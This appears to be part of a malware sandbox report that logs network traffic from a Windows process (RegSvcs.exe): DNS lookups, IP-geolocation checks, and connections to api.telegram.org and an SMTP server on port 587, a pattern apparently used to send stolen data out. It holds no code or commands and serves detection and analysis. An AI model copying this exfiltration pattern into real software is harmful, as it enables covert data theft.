Jan 15, 2025 15:02:14.527201891 CET	49782	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:14.532457113 CET	49784	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:14.537266970 CET	80	49784	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:14.537350893 CET	49784	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:14.537477970 CET	49784	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:14.542224884 CET	80	49784	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:14.590290070 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:14.594630003 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:14.599420071 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:15.746588945 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:15.758577108 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:15.763436079 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:15.904639959 CET	80	49784	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:15.906357050 CET	49796	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:15.906411886 CET	443	49796	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:15.906488895 CET	49796	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:15.906934977 CET	49796	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:15.906948090 CET	443	49796	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:15.958296061 CET	49784	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:16.365413904 CET	443	49796	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:16.411406994 CET	49796	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:16.490744114 CET	49796	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:16.490773916 CET	443	49796	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:16.603414059 CET	443	49796	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:16.603488922 CET	443	49796	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:16.603660107 CET	49796	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:16.604562998 CET	49796	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:16.619930029 CET	49784	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:16.624910116 CET	80	49784	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:16.624954939 CET	49784	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:16.627495050 CET	49803	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:16.627542973 CET	443	49803	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:16.627682924 CET	49803	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:16.628118992 CET	49803	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:16.628133059 CET	443	49803	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:16.911761045 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:16.954657078 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:16.962132931 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:17.273317099 CET	443	49803	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:17.273406029 CET	49803	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:17.277019024 CET	49803	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:17.277030945 CET	443	49803	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:17.277323008 CET	443	49803	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:17.287183046 CET	49803	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:17.327368975 CET	443	49803	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:17.519076109 CET	443	49803	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:17.519157887 CET	443	49803	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:17.519218922 CET	49803	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:17.519855022 CET	49803	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:18.108984947 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:18.113308907 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:18.118159056 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:19.266153097 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:19.317671061 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:19.320744991 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:19.325541973 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:20.434092999 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:20.469050884 CET	49829	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:20.469084978 CET	443	49829	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:20.469152927 CET	49829	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:20.473555088 CET	49829	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:20.473565102 CET	443	49829	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:20.489533901 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:20.934878111 CET	443	49829	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:20.934958935 CET	49829	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:20.936953068 CET	49829	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:20.936963081 CET	443	49829	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:20.937269926 CET	443	49829	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:20.989512920 CET	49829	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:20.998142958 CET	49829	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:21.043329000 CET	443	49829	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:21.109852076 CET	443	49829	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:21.109925032 CET	443	49829	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:21.109972954 CET	49829	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:21.111259937 CET	49829	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:21.117599964 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:21.122348070 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:22.269556999 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:22.273173094 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:22.278212070 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:23.348242998 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:23.351696968 CET	49848	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:23.351744890 CET	443	49848	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:23.351820946 CET	49848	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:23.352154970 CET	49848	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:23.352173090 CET	443	49848	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:23.395875931 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:23.838443995 CET	443	49848	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:23.840239048 CET	49848	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:23.840260983 CET	443	49848	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:23.985716105 CET	443	49848	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:23.985795021 CET	443	49848	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:23.985846996 CET	49848	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:23.986529112 CET	49848	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:23.990521908 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:23.991941929 CET	49853	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:23.995556116 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:23.995639086 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:23.996790886 CET	80	49853	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:23.996881008 CET	49853	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:23.997052908 CET	49853	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:24.002228022 CET	80	49853	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:25.167860985 CET	49775	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:25.206979036 CET	80	49853	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:25.215420008 CET	49859	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:25.215451002 CET	443	49859	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:25.215516090 CET	49859	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:25.215853930 CET	49859	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:25.215863943 CET	443	49859	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:25.255143881 CET	49853	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:25.353255987 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:25.358069897 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:25.358139038 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:25.670125008 CET	443	49859	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:25.671957016 CET	49859	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:25.671979904 CET	443	49859	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:25.821611881 CET	443	49859	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:25.821686029 CET	443	49859	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:25.821738958 CET	49859	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:25.822705030 CET	49859	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:25.828062057 CET	49865	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:25.832954884 CET	80	49865	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:25.833209991 CET	49865	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:25.833209991 CET	49865	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:25.838152885 CET	80	49865	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:26.044300079 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.044555902 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:26.049448967 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.191450119 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.192650080 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:26.197449923 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.342356920 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.345673084 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:26.350583076 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.497622013 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.501420021 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:26.506901026 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.650120974 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.650391102 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:26.655280113 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.822705030 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.822923899 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:26.827778101 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.971041918 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.973084927 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:26.973234892 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:26.973298073 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:26.973339081 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:26.977888107 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.978034973 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.978048086 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.978159904 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:26.978238106 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:27.317142963 CET	587	49860	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:27.364599943 CET	49860	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:27.415630102 CET	80	49865	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:27.458197117 CET	49873	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:27.458240032 CET	443	49873	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:27.458353996 CET	49873	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:27.458372116 CET	49865	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:27.460504055 CET	49873	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:27.460521936 CET	443	49873	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:28.084170103 CET	443	49873	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:28.084259987 CET	49873	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:28.086652994 CET	49873	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:28.086659908 CET	443	49873	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:28.086955070 CET	443	49873	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:28.089173079 CET	49873	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:28.135330915 CET	443	49873	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:28.333827019 CET	443	49873	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:28.333904028 CET	443	49873	149.154.167.220	192.168.2.10
Jan 15, 2025 15:02:28.333961010 CET	49873	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:28.334610939 CET	49873	443	192.168.2.10	149.154.167.220
Jan 15, 2025 15:02:36.632939100 CET	49853	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:36.775269985 CET	49865	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:36.776026964 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:36.780879021 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:36.780989885 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:36.781491041 CET	80	49865	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:36.781552076 CET	49865	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:37.318792105 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:37.364626884 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:37.372570038 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:37.377382994 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:37.519138098 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:37.521856070 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:37.526701927 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:37.671436071 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:37.673002005 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:37.678347111 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:37.825809002 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:37.826275110 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:37.831135035 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:37.974534988 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:37.974771023 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:37.979727030 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:38.146995068 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:38.147301912 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:38.152956963 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:38.294559956 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:38.295306921 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:38.295419931 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:38.295449972 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:38.295492887 CET	49925	587	192.168.2.10	208.91.199.223
Jan 15, 2025 15:02:38.300143003 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:38.300168991 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:38.300223112 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:38.300234079 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:38.300352097 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:38.648910046 CET	587	49925	208.91.199.223	192.168.2.10
Jan 15, 2025 15:02:38.692712069 CET	49925	587	192.168.2.10	208.91.199.223

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 15:02:01.418173075 CET	52610	53	192.168.2.10	1.1.1.1
Jan 15, 2025 15:02:01.425405025 CET	53	52610	1.1.1.1	192.168.2.10
Jan 15, 2025 15:02:10.404071093 CET	54078	53	192.168.2.10	1.1.1.1
Jan 15, 2025 15:02:10.412475109 CET	53	54078	1.1.1.1	192.168.2.10
Jan 15, 2025 15:02:16.620148897 CET	58041	53	192.168.2.10	1.1.1.1
Jan 15, 2025 15:02:16.626913071 CET	53	58041	1.1.1.1	192.168.2.10
Jan 15, 2025 15:02:25.345161915 CET	63231	53	192.168.2.10	1.1.1.1
Jan 15, 2025 15:02:25.352410078 CET	53	63231	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 15:02:01.418173075 CET	192.168.2.10	1.1.1.1	0xdfdb	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:10.404071093 CET	192.168.2.10	1.1.1.1	0xa8e6	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:16.620148897 CET	192.168.2.10	1.1.1.1	0xf4aa	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:25.345161915 CET	192.168.2.10	1.1.1.1	0x7793	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 15:02:01.425405025 CET	1.1.1.1	192.168.2.10	0xdfdb	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 15:02:01.425405025 CET	1.1.1.1	192.168.2.10	0xdfdb	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:01.425405025 CET	1.1.1.1	192.168.2.10	0xdfdb	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:01.425405025 CET	1.1.1.1	192.168.2.10	0xdfdb	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:01.425405025 CET	1.1.1.1	192.168.2.10	0xdfdb	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:01.425405025 CET	1.1.1.1	192.168.2.10	0xdfdb	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:10.412475109 CET	1.1.1.1	192.168.2.10	0xa8e6	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:10.412475109 CET	1.1.1.1	192.168.2.10	0xa8e6	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:10.412475109 CET	1.1.1.1	192.168.2.10	0xa8e6	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:10.412475109 CET	1.1.1.1	192.168.2.10	0xa8e6	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:10.412475109 CET	1.1.1.1	192.168.2.10	0xa8e6	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:10.412475109 CET	1.1.1.1	192.168.2.10	0xa8e6	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:10.412475109 CET	1.1.1.1	192.168.2.10	0xa8e6	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:16.626913071 CET	1.1.1.1	192.168.2.10	0xf4aa	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:25.352410078 CET	1.1.1.1	192.168.2.10	0x7793	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:25.352410078 CET	1.1.1.1	192.168.2.10	0x7793	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:25.352410078 CET	1.1.1.1	192.168.2.10	0x7793	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:02:25.352410078 CET	1.1.1.1	192.168.2.10	0x7793	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49707	158.101.44.242	80	7800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 15:02:01.437635899 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 15, 2025 15:02:03.210124016 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 32cdc5a4f846b41661daea109d061946 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 15, 2025 15:02:03.216758013 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:04.390697956 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:04 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: c623fc96ed10a0521fa64b7bb229b25e Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 15, 2025 15:02:04.408435106 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:05.566806078 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:05 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: cb22af350a798b3af60b29efaf554c28 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
